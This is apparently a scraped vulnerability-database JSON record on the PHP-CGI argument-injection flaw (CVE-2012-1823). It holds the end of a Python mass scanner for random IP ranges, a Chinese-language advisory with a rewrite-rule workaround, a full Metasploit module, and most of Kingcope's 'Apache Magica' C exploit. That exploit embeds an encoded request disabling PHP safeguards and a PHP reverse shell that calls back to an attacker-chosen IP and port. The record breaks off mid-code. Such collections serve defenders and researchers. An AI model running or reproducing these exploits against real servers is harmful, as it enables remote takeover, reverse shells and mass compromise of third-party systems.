args.r: \nprint \"[+] sc4nn1ng r4ng3 %s \" % (args.r) \nm0de = VULN \nrsa, rsb = m4k3_ipv4_r4ng3(args.r) \nvu1nz = sc4n_r4ng3(rsa, rsb, args, m0de) \nif args.R: \nprint \"[+] sc4nn1ng %d r4nd0m b0xes\" % (int(args.R)) \nm0de = VULN \nif not args.S: \nargs.S = float(2) \nh0sts = m4k3_r4nd_1p4ddr(int(args.R)) \nfor h0st in h0sts: \ntry: \nt = threading.Thread(target=sc4n_r4nd0m, args=(args, h0st, \nm0de, vu1nz)) \nt.start() \ntime.sleep(float(args.S)) \nwhile threading.activeCount() > int(args.T): \ntime.sleep(2) \nexcept: \nsys.stdout.flush() \nsys.stdout.write(\"\\b\\b[!] w4rn1ng: ab0rt3d bY us3r\\n\") \nraise SystemExit \nif args.i: \nprint \"[+] sc4nn1ng b0xes fr0m f1le %s\" % (args.i) \nm0de = VULN \nh0sts = tuple(open(args.i, 'r')) \nif not args.S: \nargs.S = float(2) \nfor h0st in h0sts: \ntry: \nt = threading.Thread(target=sc4n_fr0m_f1le, args=(args, \nh0st, m0de, vu1nz)) \nt.start() \ntime.sleep(float(args.S)) \nwhile threading.activeCount() > int(args.T): \ntime.sleep(2) \nexcept KeyboardInterrupt: \nsys.stdout.flush() \nsys.stdout.write(\"\\b\\b[!] w4rn1ng: ab0rt3d bY us3r\\n\") \nraise SystemExit \n#sc4n_fr0m_f1le(args, h0sts, m0de, vu1nz) \nexcept KeyboardInterrupt: \nsys.stdout.flush() \nsys.stderr.write(\"\\b\\b[!] w4rn1ng: ab0rt3d bY us3r\\n\") \nraise SystemExit \nwr1te_fil3(args, vu1nz) \n \nreturn \n \n \ndef m41n(): \nif __name__ == \"__main__\": \nprint \"--==[ ap-unlock-v2.py by noptrix@nullsecurity.net ]==--\" \nc0ntr0ller() \nelse: \nprint \"[-] 3rr0r: y0u fuck3d up dud3\" \nsys.exit(1) \nprint \"[+] h0p3 1t h3lp3d\" \n \n \n# \\o/ fr33 requiem 1337 h4x0rs ... \nm41n() \n \n# e0F \n`\n", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "sourceHref": "https://packetstormsecurity.com/files/download/123859/ap-unlock-v2.py.txt"}], "seebug": [{"lastseen": "2017-11-19T17:52:45", "bulletinFamily": "exploit", "description": "CVE ID: CVE-2012-1823\r\n\r\nPHP\u662f\u4e00\u79cdHTML\u5185\u5d4c\u5f0f\u7684\u8bed\u8a00\uff0cPHP\u4e0e\u5fae\u8f6f\u7684ASP\u9887\u6709\u51e0\u5206\u76f8\u4f3c\uff0c\u90fd\u662f\u4e00\u79cd\u5728\u670d\u52a1\u5668\u7aef\u6267\u884c\u7684\u5d4c\u5165HTML\u6587\u6863\u7684\u811a\u672c\u8bed\u8a00\uff0c\u8bed\u8a00\u7684\u98ce\u683c\u6709\u7c7b\u4f3c\u4e8eC\u8bed\u8a00\uff0c\u73b0\u5728\u88ab\u5f88\u591a\u7684\u7f51\u7ad9\u7f16\u7a0b\u4eba\u5458\u5e7f\u6cdb\u7684\u8fd0\u7528\u3002\u53ef\u4ee5\u88ab\u5404\u79cdWeb\u670d\u52a1\u5668\u4ee5\u591a\u79cd\u65b9\u5f0f\u8c03\u7528\uff0c\u5b9e\u73b0\u52a8\u6001\u7f51\u9875\u7684\u529f\u80fd\u3002\r\n\r\nPHP\u5904\u7406\u53c2\u6570\u7684\u4f20\u9012\u65f6\u5b58\u5728\u6f0f\u6d1e\uff0c\u5728\u7279\u5b9a\u7684\u914d\u7f6e\u60c5\u51b5\u4e0b\uff0c\u8fdc\u7a0b\u653b\u51fb\u8005\u53ef\u80fd\u5229\u7528\u6b64\u6f0f\u6d1e\u5728\u670d\u52a1\u5668\u4e0a\u83b7\u53d6\u811a\u672c\u6e90\u7801\u6216\u6267\u884c\u4efb\u610f\u547d\u4ee4\u3002\r\n\r\n\u5f53PHP\u4ee5\u7279\u5b9a\u7684CGI\u65b9\u5f0f\u88ab\u8c03\u7528\u65f6\uff08\u4f8b\u5982Apache\u7684mod_cgid\uff09\uff0cphp-cgi\u63a5\u6536\u5904\u7406\u8fc7\u7684\u67e5\u8be2\u683c\u5f0f\u5b57\u7b26\u4e32\u4f5c\u4e3a\u547d\u4ee4\u884c\u53c2\u6570\uff0c\u5141\u8bb8\u547d\u4ee4\u884c\u5f00\u5173\uff08\u4f8b\u5982-s\u3001-d \u6216-c\uff09\u4f20\u9012\u5230php-cgi\u7a0b\u5e8f\uff0c\u5bfc\u81f4\u6e90\u4ee3\u7801\u6cc4\u9732\u548c\u4efb\u610f\u4ee3\u7801\u6267\u884c\u3002FastCGI\u4e0d\u53d7\u5f71\u54cd\u3002\n0\nPHP\n\u4e34\u65f6\u89e3\u51b3\u65b9\u6cd5\uff1a\r\n\r\n\u4f7f\u7528RewriteRule\u6765\u8fc7\u6ee4\u8bf7\u6c42\uff1a\r\n\r\nRewriteRule\u89c4\u5219\u5982\u4e0b\r\n\r\nRewriteEngine on\r\nRewriteCond %{QUERY_STRING} ^[^=]*$\r\nRewriteCond %{QUERY_STRING} %2d|\\- [NC]\r\nRewriteRule .? - [F,L]\r\n\r\n\u5382\u5546\u8865\u4e01\uff1a\r\n\r\nPHP\r\n---\r\n\u76ee\u524d\u5382\u5546\u5df2\u7ecf\u53d1\u5e03\u4e865.3.12\u53ca5.4.2\u4e24\u4e2a\u6700\u65b0\u7248\u672c\uff0c\u4f46\u6709\u62a5\u544a\u8bf4\u5e76\u6ca1\u6709\u6b63\u786e\u4fee\u590d\u8fd9\u4e2a\u5b89\u5168\u95ee\u9898\uff0c\u8bf7\u5bc6\u5207\u5173\u6ce8\u5382\u5546\u7f51\u7ad9\u4e0b\u8f7d\u6700\u65b0\u7248\u672c\uff1a\r\n\r\nhttp://www.php.net", "modified": "2012-05-04T00:00:00", "published": "2012-05-04T00:00:00", "href": "https://www.seebug.org/vuldb/ssvid-60093", "id": "SSV:60093", "type": "seebug", "title": "PHP-CGI\u8fdc\u7a0b\u4efb\u610f\u4ee3\u7801\u6267\u884c\u6f0f\u6d1e", "sourceData": "\n ##\r\n# $Id$\r\n##\r\n\r\n##\r\n# This file is part of the Metasploit Framework and may be subject to\r\n# redistribution and commercial restrictions. Please see the Metasploit\r\n# web site for more information on licensing and terms of use.\r\n# http://metasploit.com/\r\n##\r\n\r\nload 'lib/msf/core/exploit/http/server.rb'\r\nrequire 'msf/core'\r\n\r\nclass Metasploit3 &lt; Msf::Exploit::Remote\r\n Rank = NormalRanking\r\n\r\n include Msf::Exploit::Remote::HttpClient\r\n\r\n def initialize(info = {})\r\n super(update_info(info,\r\n 'Name' =&gt; 'PHP CGI Argument Injection',\r\n 'Description' =&gt; %q{\r\n When run as a CGI, PHP up to version 5.3.12 and 5.4.2 is vulnerable to\r\n an argument injection vulnerability. This module takes advantage of\r\n the -d flag to set php.ini directives to achieve code execution.\r\n From the advisory: &quot;if there is NO unescaped \u2018=\u2019 in the query string,\r\n the string is split on \u2018+\u2019 (encoded space) characters, urldecoded,\r\n passed to a function that escapes shell metacharacters (the \u201cencoded in\r\n a system-defined manner\u201d from the RFC) and then passes them to the CGI\r\n binary.&quot;\r\n },\r\n 'Author' =&gt; [ 'egypt', 'hdm' ],\r\n 'License' =&gt; MSF_LICENSE,\r\n 'Version' =&gt; '$Revision$',\r\n 'References' =&gt; [\r\n [ &quot;CVE&quot; , &quot;2012-1823&quot; ],\r\n [ &quot;URL&quot; , &quot;http://eindbazen.net/2012/05/php-cgi-advisory-cve-2012-1823/&quot; ],\r\n ],\r\n 'Privileged' =&gt; false,\r\n 'Payload' =&gt;\r\n {\r\n 'DisableNops' =&gt; true,\r\n # Arbitrary big number. The payload gets sent as an HTTP\r\n # response body, so really it's unlimited\r\n 'Space' =&gt; 262144, # 256k\r\n },\r\n 'DisclosureDate' =&gt; 'May 03 2012',\r\n 'Platform' =&gt; 'php',\r\n 'Arch' =&gt; ARCH_PHP,\r\n 'Targets' =&gt; [[ 'Automatic', { }]],\r\n 'DefaultTarget' =&gt; 0))\r\n\r\n register_options([\r\n OptString.new('TARGETURI', [false, &quot;The URI to request&quot;]),\r\n ], self.class)\r\n end\r\n\r\n # php-cgi -h\r\n # ...\r\n # -s Display colour syntax highlighted source.\r\n def check\r\n uri = target_uri.path\r\n if(uri and ! uri.empty?)\r\n uri.gsub!(/\\?.*/, &quot;&quot;)\r\n\r\n print_status(&quot;Checking uri #{uri}&quot;)\r\n\r\n response = send_request_raw({ 'uri' =&gt; uri })\r\n\r\n if response and response.code == 200 and response.body =~ /\\&lt;code\\&gt;\\&lt;span style.*\\&amp;lt\\;\\?/mi\r\n print_error(&quot;Server responded in a way that was ambiguous, could not determine whether it was vulnerable&quot;)\r\n return Exploit::CheckCode::Unknown\r\n end\r\n\r\n response = send_request_raw({ 'uri' =&gt; uri + '?-s'})\r\n if response and response.code == 200 and response.body =~ /\\&lt;code\\&gt;\\&lt;span style.*\\&amp;lt\\;\\?/mi\r\n return Exploit::CheckCode::Vulnerable\r\n end\r\n\r\n print_error(&quot;Server responded indicating it was not vulnerable&quot;)\r\n return Exploit::CheckCode::Safe\r\n else\r\n return Exploit::CheckCode::Unknown\r\n end\r\n end\r\n\r\n def exploit\r\n #sleep 100\r\n begin\r\n php_trues = [ &quot;1&quot;, &quot;on&quot;, &quot;true&quot; ]\r\n php_falses = [ &quot;0&quot;, &quot;off&quot;, &quot;false&quot; ]\r\n args = [\r\n &quot;-d+allow_url_include%3d#{rand_php_ini_true}&quot;,\r\n &quot;-d+auto_prepend_file%3dphp://input&quot;,\r\n ]\r\n\r\n qs = args.join(&quot;+&quot;)\r\n uri = &quot;#{target_uri}?#{qs}&quot;\r\n p uri\r\n\r\n # Has to be all on one line, so gsub out the comments and the newlines\r\n payload_oneline = &quot;&lt;?php &quot; +payload.encoded.gsub(/\\s*#.*$/, &quot;&quot;).gsub(&quot;\\n&quot;, &quot;&quot;)\r\n response = send_request_cgi( {\r\n 'method' =&gt; &quot;POST&quot;,\r\n 'global' =&gt; true,\r\n 'uri' =&gt; uri,\r\n 'data' =&gt; payload_oneline,\r\n }, 0.1)\r\n handler\r\n\r\n rescue ::Interrupt\r\n raise $!\r\n rescue ::Rex::HostUnreachable, ::Rex::ConnectionRefused\r\n print_error(&quot;The target service unreachable&quot;)\r\n rescue ::OpenSSL::SSL::SSLError\r\n print_error(&quot;The target failed to negotiate SSL, is this really an SSL service?&quot;)\r\n end\r\n end\r\n\r\n def rand_php_ini_false\r\n [ &quot;0&quot;, &quot;off&quot;, &quot;false&quot; ].sort_by{rand}.first\r\n end\r\n\r\n def rand_php_ini_true\r\n [ &quot;1&quot;, &quot;on&quot;, &quot;true&quot; ].sort_by{rand}.first\r\n end\r\n\r\nend\n ", "sourceHref": "https://www.seebug.org/vuldb/ssvid-60093", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2017-11-19T15:16:41", "bulletinFamily": "exploit", "description": "No description provided by source.", "modified": "2014-07-01T00:00:00", "published": "2014-07-01T00:00:00", "href": "https://www.seebug.org/vuldb/ssvid-82805", "id": "SSV:82805", "title": "Apache / PHP 5.x - cgi-bin Remote Code Execution Exploit", "type": "seebug", "sourceData": "\n /* Apache Magica by Kingcope */\r\n/* gcc apache-magika.c -o apache-magika -lssl */\r\n/* This is a code execution bug in the combination of Apache and PHP.\r\nOn Debian and Ubuntu the vulnerability is present in the default install\r\nof the php5-cgi package. When the php5-cgi package is installed on Debian and\r\nUbuntu or php-cgi is installed manually the php-cgi binary is accessible under\r\n/cgi-bin/php5 and /cgi-bin/php. The vulnerability makes it possible to execute\r\nthe binary because this binary has a security check enabled when installed with\r\nApache http server and this security check is circumvented by the exploit.\r\nWhen accessing the php-cgi binary the security check will block the request and\r\nwill not execute the binary.\r\nIn the source code file sapi/cgi/cgi_main.c of PHP we can see that the security\r\ncheck is done when the php.ini configuration setting cgi.force_redirect is set\r\nand the php.ini configuration setting cgi.redirect_status_env is set to no.\r\nThis makes it possible to execute the binary bypassing the Security check by\r\nsetting these two php.ini settings.\r\nPrior to this code for the Security check getopt is called and it is possible\r\nto set cgi.force_redirect to zero and cgi.redirect_status_env to zero using the\r\n-d switch. If both values are set to zero and the request is sent to the server\r\nphp-cgi gets fully executed and we can use the payload in the POST data field\r\nto execute arbitrary php and therefore we can execute programs on the system.\r\napache-magika.c is an exploit that does exactly the prior described. It does\r\nsupport SSL.\r\n/* Affected and tested versions\r\nPHP 5.3.10\r\nPHP 5.3.8-1\r\nPHP 5.3.6-13\r\nPHP 5.3.3\r\nPHP 5.2.17\r\nPHP 5.2.11\r\nPHP 5.2.6-3\r\nPHP 5.2.6+lenny16 with Suhosin-Patch\r\nAffected versions\r\nPHP prior to 5.3.12\r\nPHP prior to 5.4.2\r\nUnaffected versions\r\nPHP 4 - getopt parser unexploitable\r\nPHP 5.3.12 and up\r\nPHP 5.4.2 and up\r\nUnaffected versions are patched by CVE-2012-1823.\r\n*/\r\n/* .\r\n /&#39;\\rrq rk\r\n . // \\\\ .\r\n.x.//fco\\\\-|-\r\n &#39;//cmtco\\\\zt\r\n //6meqrg.\\\\tq\r\n//_________\\\\&#39;\r\nEJPGQO\r\napache-magica.c by Kingcope\r\n*/\r\n\r\n#include &#60;stdio.h&#62;\r\n#include &#60;stdlib.h&#62;\r\n#include &#60;unistd.h&#62;\r\n#include &#60;getopt.h&#62;\r\n#include &#60;sys/types.h&#62;\r\n#include &#60;stddef.h&#62;\r\n#include &#60;openssl/rand.h&#62;\r\n#include &#60;openssl/ssl.h&#62;\r\n#include &#60;openssl/err.h&#62;\r\n#include &#60;netdb.h&#62;\r\n#include &#60;sys/socket.h&#62;\r\n#include &#60;netinet/in.h&#62;\r\n\r\ntypedef struct {\r\n\tint sockfd;\r\n\tSSL *handle;\r\n\tSSL_CTX *ctx;\r\n} connection;\r\n\r\nvoid usage(char *argv[])\r\n{\r\n printf(&#34;usage: %s &#60;--target target&#62; &#60;--port port&#62; &#60;--protocol http|https&#62; &#34; \\\r\n &#34;&#60;--reverse-ip ip&#62; &#60;--reverse-port port&#62; [--force-interpreter interpreter]\\n&#34;,\r\n argv[0]);\r\n exit(1);\r\n}\r\n\r\nchar poststr[] = &#34;POST %s?%%2D%%64+%%61%%6C%%6C%%6F%%77%%5F&#34; \\\r\n &#34;%%75%%72%%6C%%5F%%69%%6E%%63%%6C%%75%%64%%65%%3D%%6F%%6E+%%2D%%64&#34; \\\r\n &#34;+%%73%%61%%66%%65%%5F%%6D%%6F%%64%%65%%3D%%6F%%66%%66+%%2D%%64+%%73&#34; \\\r\n &#34;%%75%%68%%6F%%73%%69%%6E%%2E%%73%%69%%6D%%75%%6C%%61%%74%%69%%6F%%6E&#34; \\\r\n &#34;%%3D%%6F%%6E+%%2D%%64+%%64%%69%%73%%61%%62%%6C%%65%%5F%%66%%75%%6E%%63&#34; \\\r\n &#34;%%74%%69%%6F%%6E%%73%%3D%%22%%22+%%2D%%64+%%6F%%70%%65%%6E%%5F%%62&#34; \\\r\n &#34;%%61%%73%%65%%64%%69%%72%%3D%%6E%%6F%%6E%%65+%%2D%%64+%%61%%75%%74&#34; \\\r\n &#34;%%6F%%5F%%70%%72%%65%%70%%65%%6E%%64%%5F%%66%%69%%6C%%65%%3D%%70%%68&#34; \\\r\n &#34;%%70%%3A%%2F%%2F%%69%%6E%%70%%75%%74+%%2D%%64+%%63%%67%%69%%2E%%66%%6F&#34; \\\r\n &#34;%%72%%63%%65%%5F%%72%%65%%64%%69%%72%%65%%63%%74%%3D%%30+%%2D%%64+%%63&#34; \\\r\n &#34;%%67%%69%%2E%%72%%65%%64%%69%%72%%65%%63%%74%%5F%%73%%74%%61%%74%%75%%73&#34; \\\r\n &#34;%%5F%%65%%6E%%76%%3D%%30+%%2D%%6E HTTP/1.1\\r\\n&#34; \\\r\n &#34;Host: %s\\r\\n&#34; \\\r\n &#34;User-Agent: Mozilla/5.0 (iPad; CPU OS 6_0 like Mac OS X) AppleWebKit/536.26&#34; \\\r\n &#34;(KHTML, like Gecko) Version/6.0 Mobile/10A5355d Safari/8536.25\\r\\n&#34; \\\r\n &#34;Content-Type: application/x-www-form-urlencoded\\r\\n&#34; \\\r\n &#34;Content-Length: %d\\r\\n&#34; \\\r\n &#34;Connection: close\\r\\n\\r\\n%s&#34;;\r\nchar phpstr[] = &#34;&#60;?php\\n&#34; \\\r\n&#34;set_time_limit(0);\\n&#34; \\\r\n&#34;$ip = &#39;%s&#39;;\\n&#34; \\\r\n&#34;$port = %d;\\n&#34; \\\r\n&#34;$chunk_size = 1400;\\n&#34; \\\r\n&#34;$write_a = null;\\n&#34; \\\r\n&#34;$error_a = null;\\n&#34; \\\r\n&#34;$shell = &#39;unset HISTFILE; unset HISTSIZE; uname -a; w; id; /bin/sh -i&#39;;\\n&#34; \\\r\n&#34;$daemon = 0;\\n&#34; \\\r\n&#34;$debug = 0;\\n&#34; \\\r\n&#34;if (function_exists(&#39;pcntl_fork&#39;)) {\\n&#34; \\\r\n&#34;\t$pid = pcntl_fork();\t\\n&#34; \\\r\n&#34;\tif ($pid == -1) {\\n&#34; \\\r\n&#34;\t\tprintit(\\&#34;ERROR: Can&#39;t fork\\&#34;);\\n&#34; \\\r\n&#34;\t\texit(1);\\n&#34; \\\r\n&#34;\t}\\n&#34; \\\r\n&#34;\tif ($pid) {\\n&#34; \\\r\n&#34;\t\texit(0);\\n&#34; \\\r\n&#34;\t}\\n&#34; \\\r\n&#34;\tif (posix_setsid() == -1) {\\n&#34; \\\r\n&#34;\t\tprintit(\\&#34;Error: Can&#39;t setsid()\\&#34;);\\n&#34; \\\r\n&#34;\t\texit(1);\\n&#34; \\\r\n&#34;\t}\\n&#34; \\\r\n&#34;\t$daemon = 1;\\n&#34; \\\r\n&#34;} else {\\n&#34; \\\r\n&#34;\tprintit(\\&#34;WARNING: Failed to daemonise.\\&#34;);\\n&#34; \\\r\n&#34;}\\n&#34; \\\r\n&#34;chdir(\\&#34;/\\&#34;);\\n&#34; \\\r\n&#34;umask(0);\\n&#34; \\\r\n&#34;$sock = fsockopen($ip, $port, $errno, $errstr, 30);\\n&#34; \\\r\n&#34;if (!$sock) {\\n&#34; \\\r\n&#34;\tprintit(\\&#34;$errstr ($errno)\\&#34;);\\n&#34; \\\r\n&#34;\texit(1);\\n&#34; \\\r\n&#34;}\\n&#34; \\\r\n&#34;$descriptorspec = array(\\n&#34; \\\r\n&#34; 0 =&#62; array(\\&#34;pipe\\&#34;, \\&#34;r\\&#34;),\\n&#34; \\\r\n&#34; 1 =&#62; array(\\&#34;pipe\\&#34;, \\&#34;w\\&#34;),\\n&#34; \\\r\n&#34; 2 =&#62; array(\\&#34;pipe\\&#34;, \\&#34;w\\&#34;)\\n&#34; \\\r\n&#34;);\\n&#34; \\\r\n&#34;$process = proc_open($shell, $descriptorspec, $pipes);\\n&#34; \\\r\n&#34;if (!is_resource($process)) {\\n&#34; \\\r\n&#34;\tprintit(\\&#34;ERROR: Can&#39;t spawn shell\\&#34;);\\n&#34; \\\r\n&#34;\texit(1);\\n&#34; \\\r\n&#34;}\\n&#34; \\\r\n&#34;stream_set_blocking($pipes[0], 0);\\n&#34; \\\r\n&#34;stream_set_blocking($pipes[1], 0);\\n&#34; \\\r\n&#34;stream_set_blocking($pipes[2], 0);\\n&#34; \\\r\n&#34;stream_set_blocking($sock, 0);\\n&#34; \\\r\n&#34;while (1) {\\n&#34; \\\r\n&#34;\tif (feof($sock)) {\\n&#34; \\\r\n&#34;\t\tprintit(\\&#34;ERROR: Shell connection terminated\\&#34;);\\n&#34; \\\r\n&#34;\t\tbreak;\\n&#34; \\\r\n&#34;\t}\\n&#34; \\\r\n&#34;\tif (feof($pipes[1])) {\\n&#34; \\\r\n&#34;\t\tprintit(\\&#34;ERROR: Shell process terminated\\&#34;);\\n&#34; \\\r\n&#34;\t\tbreak;\\n&#34; \\\r\n&#34;\t}\\n&#34; \\\r\n&#34;\t$read_a = array($sock, $pipes[1], $pipes[2]);\\n&#34; \\\r\n&#34;\t$num_changed_sockets = stream_select($read_a, $write_a, $error_a, null);\\n&#34; \\\r\n&#34;\tif (in_array($sock, $read_a)) {\\n&#34; \\\r\n&#34;\t\tif ($debug) printit(\\&#34;SOCK READ\\&#34;);\\n&#34; \\\r\n&#34;\t\t$input = fread($sock, $chunk_size);\\n&#34; \\\r\n&#34;\t\tif ($debug) printit(\\&#34;SOCK: $input\\&#34;);\\n&#34; \\\r\n&#34;\t\tfwrite($pipes[0], $input);\\n&#34; \\\r\n&#34;\t}\\n&#34; \\\r\n&#34;\tif (in_array($pipes[1], $read_a)) {\\n&#34; \\\r\n&#34;\t\tif ($debug) printit(\\&#34;STDOUT READ\\&#34;);\\n&#34; \\\r\n&#34;\t\t$input = fread($pipes[1], $chunk_size);\\n&#34; \\\r\n&#34;\t\tif ($debug) printit(\\&#34;STDOUT: $input\\&#34;);\\n&#34; \\\r\n&#34;\t\tfwrite($sock, $input);\\n&#34; \\\r\n&#34;\t}\\n&#34; \\\r\n&#34;\tif (in_array($pipes[2], $read_a)) {\\n&#34; \\\r\n&#34;\t\tif ($debug) printit(\\&#34;STDERR READ\\&#34;);\\n&#34; \\\r\n&#34;\t\t$input = fread($pipes[2], $chunk_size);\\n&#34; \\\r\n&#34;\t\tif ($debug) printit(\\&#34;STDERR: $input\\&#34;);\\n&#34; \\\r\n&#34;\t\tfwrite($sock, $input);\\n&#34; \\\r\n&#34;\t}\\n&#34; \\\r\n&#34;}\\n&#34; \\\r\n&#34;\\n&#34; \\\r\n&#34;fclose($sock);\\n&#34; \\\r\n&#34;fclose($pipes[0]);\\n&#34; \\\r\n&#34;fclose($pipes[1]);\\n&#34; \\\r\n&#34;fclose($pipes[2]);\\n&#34; \\\r\n&#34;proc_close($process);\\n&#34; \\\r\n&#34;function printit ($string) {\\n&#34; \\\r\n&#34;\tif (!$daemon) {\\n&#34; \\\r\n&#34;\t\tprint \\&#34;$string\\n\\&#34;;\\n&#34; \\\r\n&#34;\t}\\n&#34; \\\r\n&#34;}\\n&#34; \\\r\n&#34;exit(1);\\n&#34; \\\r\n&#34;?&#62;&#34;;\r\n\r\nstruct sockaddr_in *gethostbyname_(char *hostname, unsigned short port)\r\n{\r\n struct hostent *he;\r\n struct sockaddr_in server, *servercopy;\r\n \r\n if ((he=gethostbyname(hostname)) == NULL) {\r\n printf(&#34;Hostname cannot be resolved\\n&#34;);\r\n exit(255);\r\n }\r\n \r\n servercopy = malloc(sizeof(struct sockaddr_in));\r\n if (!servercopy) {\r\n\tprintf(&#34;malloc error (1)\\n&#34;);\r\n\texit(255);\r\n }\r\n memset(&server, &#39;\\0&#39;, sizeof(struct sockaddr_in));\r\n memcpy(&server.sin_addr, he-&#62;h_addr_list[0], he-&#62;h_length);\r\n server.sin_family = AF_INET;\r\n server.sin_port = htons(port);\r\n memcpy(servercopy, &server, sizeof(struct sockaddr_in));\r\n return servercopy;\r\n}\r\n\r\nchar *sslread(connection *c)\r\n{\r\n char *rc = NULL;\r\n int received, count = 0, count2=0;\r\n char ch;\r\n\r\n for(;;)\r\n {\r\n if (!rc)\r\n rc = calloc(1024, sizeof (char) + 1);\r\n else\r\n if (count2 % 1024 == 0) {\r\n rc = realloc(rc, (count2 + 1) * 1024 * sizeof (char) + 1);\r\n }\r\n received = SSL_read(c-&#62;handle, &ch, 1);\r\n if (received == 1) {\r\n rc[count++] = ch;\r\n count2++;\r\n if (count2 &#62; 1024*5)\r\n\t break;\r\n }\r\n else\r\n break;\r\n }\r\n return rc;\r\n}\r\n\r\nchar *read_(int sockfd)\r\n{\r\n char *rc = NULL;\r\n int received, count = 0, count2=0;\r\n char ch;\r\n\r\n for(;;)\r\n {\r\n if (!rc)\r\n rc = calloc(1024, sizeof (char) + 1);\r\n else\r\n if (count2 % 1024 == 0) {\r\n rc = realloc(rc, (count2 + 1) * 1024 * sizeof (char) + 1);\r\n }\r\n received = read(sockfd, &ch, 1);\r\n if (received == 1) {\r\n rc[count++] = ch;\r\n count2++;\r\n if (count2 &#62; 1024*5)\r\n\t break;\r\n }\r\n else\r\n break;\r\n }\r\n return rc;\r\n}\r\n\r\nvoid main(int argc, char *argv[])\r\n{\r\n char *target, *protocol, *targetip, *writestr, *tmpstr, *readbuf=NULL,\r\n *interpreter, *reverseip, *reverseportstr, *forceinterpreter=NULL;\r\n char httpsflag=0;\r\n unsigned short port=0, reverseport=0;\r\n struct sockaddr_in *server;\r\n int sockfd;\r\n unsigned int writesize, tmpsize;\r\n unsigned int i;\r\n connection *sslconnection;\r\n printf(&#34;-== Apache Magika by Kingcope ==-\\n&#34;);\r\n for(;;)\r\n {\r\n\t int c;\r\n int option_index=0;\r\n static struct option long_options[] = {\r\n\t {&#34;target&#34;, required_argument, 0, 0 },\r\n\t {&#34;port&#34;, required_argument, 0, 0 },\r\n\t {&#34;protocol&#34;, required_argument, 0, 0 },\r\n\t {&#34;reverse-ip&#34;, required_argument, 0, 0 },\r\n\t {&#34;reverse-port&#34;, required_argument, 0, 0 },\r\n\t {&#34;force-interpreter&#34;, required_argument, 0, 0 },\t \r\n\t {0, 0, 0, 0 }\r\n\t };\r\n\t \r\n\t c = getopt_long(argc, argv, &#34;&#34;, long_options, &option_index);\r\n if (c &#60; 0)\r\n \tbreak;\r\n \r\n switch (c) {\r\n\t case 0:\r\n\t switch (option_index) {\r\n\t case 0:\r\n\t if (optarg) {\r\n\t target = calloc(strlen(optarg)+1, sizeof(char));\r\n\t if (!target) {\r\n\t\t printf(&#34;calloc error (2)\\n&#34;);\r\n\t exit(255);\r\n }\r\n\t memcpy(target, optarg, strlen(optarg)+1);\r\n \t}\r\n break;\r\n case 1:\r\n if(optarg)\r\n\t port = atoi(optarg);\r\n break;\r\n case 2:\r\n protocol = calloc(strlen(optarg)+1, sizeof(char));\r\n if (!protocol) {\r\n\t printf(&#34;calloc error (3)\\n&#34;);\r\n exit(255);\r\n }\r\n memcpy(protocol, optarg, strlen(optarg)+1);\r\n if (!strcmp(protocol, &#34;https&#34;))\r\n httpsflag=1;\r\n break;\r\n case 3:\r\n reverseip = calloc(strlen(optarg)+1, sizeof(char));\r\n if (!reverseip) {\r\n\t printf(&#34;calloc error (4)\\n&#34;);\r\n exit(255);\r\n }\r\n memcpy(reverseip, optarg, strlen(optarg)+1); \r\n break;\r\n case 4:\r\n\t reverseport = atoi(optarg); \r\n\t\treverseportstr = calloc(strlen(optarg)+1, sizeof(char));\r\n if (!reverseportstr) {\r\n\t printf(&#34;calloc error (5)\\n&#34;);\r\n exit(255);\r\n }\r\n memcpy(reverseportstr, optarg, strlen(optarg)+1); \t \r\n break;\r\n case 5:\r\n forceinterpreter = calloc(strlen(optarg)+1, sizeof(char));\r\n if (!forceinterpreter) {\r\n\t printf(&#34;calloc error (6)\\n&#34;);\r\n exit(255);\r\n }\r\n memcpy(forceinterpreter, optarg, strlen(optarg)+1); \r\n break;\r\n default:\r\n usage(argv);\r\n\t }\r\n\t break;\r\n\t \r\n\t default:\r\n\t usage(argv);\r\n }\r\n }\r\n\r\n if ((optind &#60; argc) || !target || !protocol || !port ||\r\n !reverseip || !reverseport){\r\n\tusage(argv);\r\n }\r\n \r\n server = gethostbyname_(target, port);\r\n if (!server) {\r\n printf(&#34;Error while resolving hostname. (7)\\n&#34;);\r\n exit(255);\r\n }\r\n\r\n char *interpreters[5];\r\n int ninterpreters = 5;\r\n interpreters[0] = strdup(&#34;/cgi-bin/php&#34;);\r\n interpreters[1] = strdup(&#34;/cgi-bin/php5&#34;);\r\n interpreters[2] = strdup(&#34;/cgi-bin/php-cgi&#34;);\r\n interpreters[3] = strdup(&#34;/cgi-bin/php.cgi&#34;);\r\n interpreters[4] = strdup(&#34;/cgi-bin/php4&#34;);\r\n \r\n for (i=0;i&#60;ninterpreters;i++) {\r\n interpreter = interpreters[i];\r\n if (forceinterpreter) {\r\n interpreter = strdup(forceinterpreter);\r\n }\r\n if (forceinterpreter && i)\r\n break;\r\n printf(&#34;%s\\n&#34;, interpreter);\r\n \r\n sockfd = socket(AF_INET, SOCK_STREAM, 0);\r\n if (sockfd &#60; 1) { \r\n\t printf(&#34;socket error (8)\\n&#34;);\r\n\t exit(255);\r\n }\r\n \r\n if (connect(sockfd, (void*)server, sizeof(struct sockaddr_in)) &#60; 0) {\r\n printf(&#34;connect error (9)\\n&#34;);\r\n exit(255);\t \r\n }\r\n if (httpsflag) {\r\n sslconnection = (connection*) malloc(sizeof(connection));\r\n if (!sslconnection) {\r\n printf(&#34;malloc error (10)\\n&#34;);\r\n exit(255); \r\n }\r\n sslconnection-&#62;handle = NULL;\r\n sslconnection-&#62;ctx = NULL;\r\n\r\n SSL_library_init();\r\n\r\n sslconnection-&#62;ctx = SSL_CTX_new(SSLv23_client_method());\r\n if (!sslconnection-&#62;ctx) {\r\n \t printf(&#34;SSL_CTX_new error (11)\\n&#34;);\r\n exit(255);\r\n }\r\n\r\n sslconnection-&#62;handle = SSL_new(sslconnection-&#62;ctx);\r\n if (!sslconnection-&#62;handle) {\r\n \t printf(&#34;SSL_new error (12)\\n&#34;);\r\n\t exit(255); \r\n }\r\n if (!SSL_set_fd(sslconnection-&#62;handle, sockfd)) {\r\n \t printf(&#34;SSL_set_fd error (13)\\n&#34;);\r\n exit(255);\r\n }\r\n \r\n if (SSL_connect(sslconnection-&#62;handle) != 1) {\r\n\t printf(&#34;SSL_connect error (14)\\n&#34;);\r\n exit(255); \r\n }\r\n }\r\n \r\n tmpsize = strlen(phpstr) + strlen(reverseip) + 